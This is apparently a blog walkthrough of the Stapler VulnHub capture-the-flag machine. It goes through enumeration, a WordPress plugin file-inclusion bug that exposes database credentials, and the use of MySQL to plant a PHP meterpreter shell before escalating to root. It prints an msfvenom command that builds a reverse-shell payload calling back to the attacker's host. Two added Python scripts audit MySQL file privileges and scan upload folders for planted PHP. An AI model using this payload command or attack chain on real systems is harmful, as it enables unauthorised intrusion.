Sunday, 12 June 2016

Stapler CTF Walkthrough

Stapler is the VulnHub VM used in their workshop at BSides London. For anyone not able to attend (myself included), the VM is hosted on VulnHub along with the workshop slides.

Enumeration

Running netdiscover -r 10.0.2.0/24 gets the IP of the target machine.


Running Nmap shows quite a few open ports.



A quick check of the website doesn't reveal anything useful.



Running Nmap with the --script banner flag reveals some more information.


With a bit more digging, I discovered that FTP was allowing the anonymous account. I was able to log in with anonymous for the username and password:


The note reveals some potential usernames, but not much else. 


Nmap also revealed an SMB share; connecting doesn't really provide anything useful, except for a version number for a WordPress install.



Knowing that there is likely a WordPress install on this box, I started investigating the unknown ports in the Nmap result. Port 12380 is running a web server, with a default landing page which is served for every request.


Switching to HTTPS allows access to the robots.txt file, which lists two directories. 


Obviously, I tried the admin directory first...


I guess this was talked about in the workshop, but it doesn't have anything useful. 

Browsing the blog URL provided something useful: a WordPress site with a couple of posts, a registration page and a login page. Trying to register didn't work (no surprise there!). Running WPScan identified that the uploads directory had directory listing enabled, which allowed me to find the plugins directory (yes, WPScan identifies these as well).

Getting a shell

Some searching later reveals that the Advanced Video plugin has an LFI exploit. Running the PoC allows wp-config to be read.



Since the image created by the exploit is corrupt (as it isn't really an image), I used wget to pull it to my Kali machine, using --no-check-certificate to bypass issues with the SSL cert on the target.


wp-config provides creds for the MySQL server running on the target.


A shell can be obtained by using 'select into outfile'. I used msfvenom to generate a PHP meterpreter payload.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=4444 -e php/base64 -f raw > shell.php

I was able to find the location of the uploads directory when digging around the WordPress install, so I can use MySQL to create my payload file in that directory.
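The write path used here (a database account holding the global FILE privilege, writing into a directory the web server executes from) is something a DBA can audit directly. The script below is an added example, not part of the original walkthrough or the Stapler VM: it parses constructed SHOW GRANTS output and a constructed my.cnf fragment, reports accounts that hold FILE (or ALL PRIVILEGES at global scope, which includes it), and checks whether secure_file_priv restricts where such writes can land. The account names, paths and grants are made up for illustration.

```python
"""Audit MySQL settings that let a database login write files to disk.

Added example, not code from the original post. Two checks a defender owns:
  1. Which accounts hold the global FILE privilege (required for
     SELECT ... INTO OUTFILE).
  2. Whether secure_file_priv confines such writes to one directory.
Inputs are constructed strings standing in for SHOW GRANTS output and a
my.cnf fragment, so the script runs offline.
"""
import configparser
import re

# Constructed sample: what SHOW GRANTS might return for a WordPress database
# user that was granted far more than a web application needs.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT FILE, SELECT, INSERT ON *.* TO 'wpuser'@'localhost'",
    "GRANT ALL PRIVILEGES ON `wordpress`.* TO 'wpuser'@'localhost'",
    "GRANT SELECT ON `wordpress`.* TO 'reporting'@'%'",
]

# Constructed my.cnf fragments. An empty secure_file_priv means no restriction.
SAMPLE_MYCNF_WEAK = """
[mysqld]
datadir = /var/lib/mysql
secure_file_priv =
"""

SAMPLE_MYCNF_HARDENED = """
[mysqld]
datadir = /var/lib/mysql
secure_file_priv = /var/lib/mysql-files
"""

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)",
    re.IGNORECASE,
)


def users_with_file_privilege(grant_lines):
    """Return the set of accounts that can use SELECT ... INTO OUTFILE.

    FILE is a global privilege, so only grants ON *.* matter; ALL PRIVILEGES
    at global scope includes it.
    """
    offenders = set()
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
            offenders.add(m.group("who"))
    return offenders


def secure_file_priv_status(mycnf_text):
    """Classify secure_file_priv from a my.cnf fragment.

    "unrestricted" when the option is present but empty (any path the server
    process can write is allowed), "restricted" when it names a directory,
    "unset" when absent (the build's compiled-in default then applies).
    """
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(mycnf_text)
    if not cp.has_option("mysqld", "secure_file_priv"):
        return "unset"
    value = (cp.get("mysqld", "secure_file_priv") or "").strip()
    return "unrestricted" if value == "" else "restricted"


def audit(grant_lines, mycnf_text):
    """Combine both checks into a list of actionable findings."""
    findings = []
    for who in sorted(users_with_file_privilege(grant_lines)):
        findings.append(f"{who} holds the global FILE privilege; revoke it "
                        "unless the account genuinely loads or dumps files")
    status = secure_file_priv_status(mycnf_text)
    if status != "restricted":
        findings.append(f"secure_file_priv is {status}; point it at a "
                        "directory outside the web root")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GRANTS, SAMPLE_MYCNF_WEAK):
        print("FINDING:", finding)
```

Against the weak sample this reports both the root account and the WordPress user, plus the empty secure_file_priv; against the hardened fragment with only database-scoped grants it reports nothing. In practice the grant lines come from `SHOW GRANTS FOR <account>` for each account in mysql.user, and the fix is `REVOKE FILE ON *.* FROM <account>` together with a secure_file_priv directory the web server cannot serve.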


I used Metasploit to run a multi/handler listener on my Kali machine and loaded the shell.php file. This is when I realised I had forgotten to add the <?PHP ?> tags to the payload...

Fixing that problem and using MySQL to create another file gave me my shell.
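The artefact this leaves on the web server is a file containing PHP code inside wp-content/uploads, a tree that should only ever hold media. The scanner below is an added example, not code from the original post: it walks an uploads directory and flags files both by executable extension and by the presence of a PHP open tag regardless of extension, so it catches the shell.php case above as well as a PHP file hidden behind a .jpg name, while ignoring the `<?xml` prologue of a legitimate SVG. The sample tree it scans is constructed in a temporary directory.

```python
"""Find server-side code planted in a WordPress uploads directory.

Added example, not from the original walkthrough. The uploads tree should
hold only media, so any file carrying a PHP open tag there, whatever its
extension, deserves an incident ticket. The sample tree is constructed in a
temporary directory so the script runs offline.
"""
import os
import re
import tempfile

# `<?php` and `<?=` are always live; a bare `<?` only executes when
# short_open_tag is on, so it is reported separately at lower confidence.
# The lookahead excludes `<?xml`, which legitimate SVG uploads start with.
PHP_LONG_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
PHP_SHORT_TAG = re.compile(rb"<\?(?![a-zA-Z=])")
CODE_EXTENSIONS = {".php", ".phtml", ".php5", ".php7", ".phar", ".inc"}


def classify_file(path):
    """Return the reasons this file looks like planted code (empty if clean)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext in CODE_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # tags sit near the start; skip reading whole videos
    if PHP_LONG_TAG.search(head):
        reasons.append("contains a PHP open tag")
    elif PHP_SHORT_TAG.search(head):
        reasons.append("contains a short open tag (needs short_open_tag=On)")
    return reasons


def scan_uploads(root):
    """Walk the uploads tree; return {relative_path: [reasons]} for suspect files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            reasons = classify_file(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def build_sample_tree():
    """Constructed sample: a benign JPEG, a benign SVG, a dropped .php file and
    a PHP file disguised as a JPEG. Contents are placeholders, not real payloads."""
    root = tempfile.mkdtemp(prefix="wp-uploads-")
    os.makedirs(os.path.join(root, "2016", "06"))
    samples = {
        os.path.join("2016", "06", "photo.jpg"): b"\xff\xd8\xff\xe0" + b"\x00" * 64,
        os.path.join("2016", "06", "diagram.svg"): b'<?xml version="1.0"?><svg/>',
        os.path.join("2016", "06", "shell.php"): b"<?php echo 'constructed'; ?>",
        os.path.join("2016", "06", "avatar.jpg"): b"\xff\xd8\xff\xe0 <?php echo 'constructed'; ?>",
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, reasons in sorted(scan_uploads(build_sample_tree()).items()):
        print(f"{rel}: {'; '.join(reasons)}")
```

Run against a real install the root argument is the wp-content/uploads path; pairing this with a web server rule that refuses to execute PHP under uploads turns the finding into a non-event even when a file does land there.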



Privilege Escalation 

The target is running Ubuntu 16.4 on kernel version 4.4; searching Exploit-DB reveals a possible privesc vuln.


The exploit was successful, and I got my root shell.



The Flag

Root privileges allowed me to grab the flag from /root/.



Final Thoughts

The description for this VM says there are several ways to get an initial shell and escalate to root. The slides also hint at multiple flags. I'm looking forward to seeing other people's methods of rooting this one. I wasn't able to figure out what was going on on port 666; I may come back to this now that I have root, but I feel like that would be cheating. There was a lot of enumeration on this box, and getting root felt almost trivial compared to getting the initial shell. Overall, this VM felt more realistic than some of the others I've attempted.
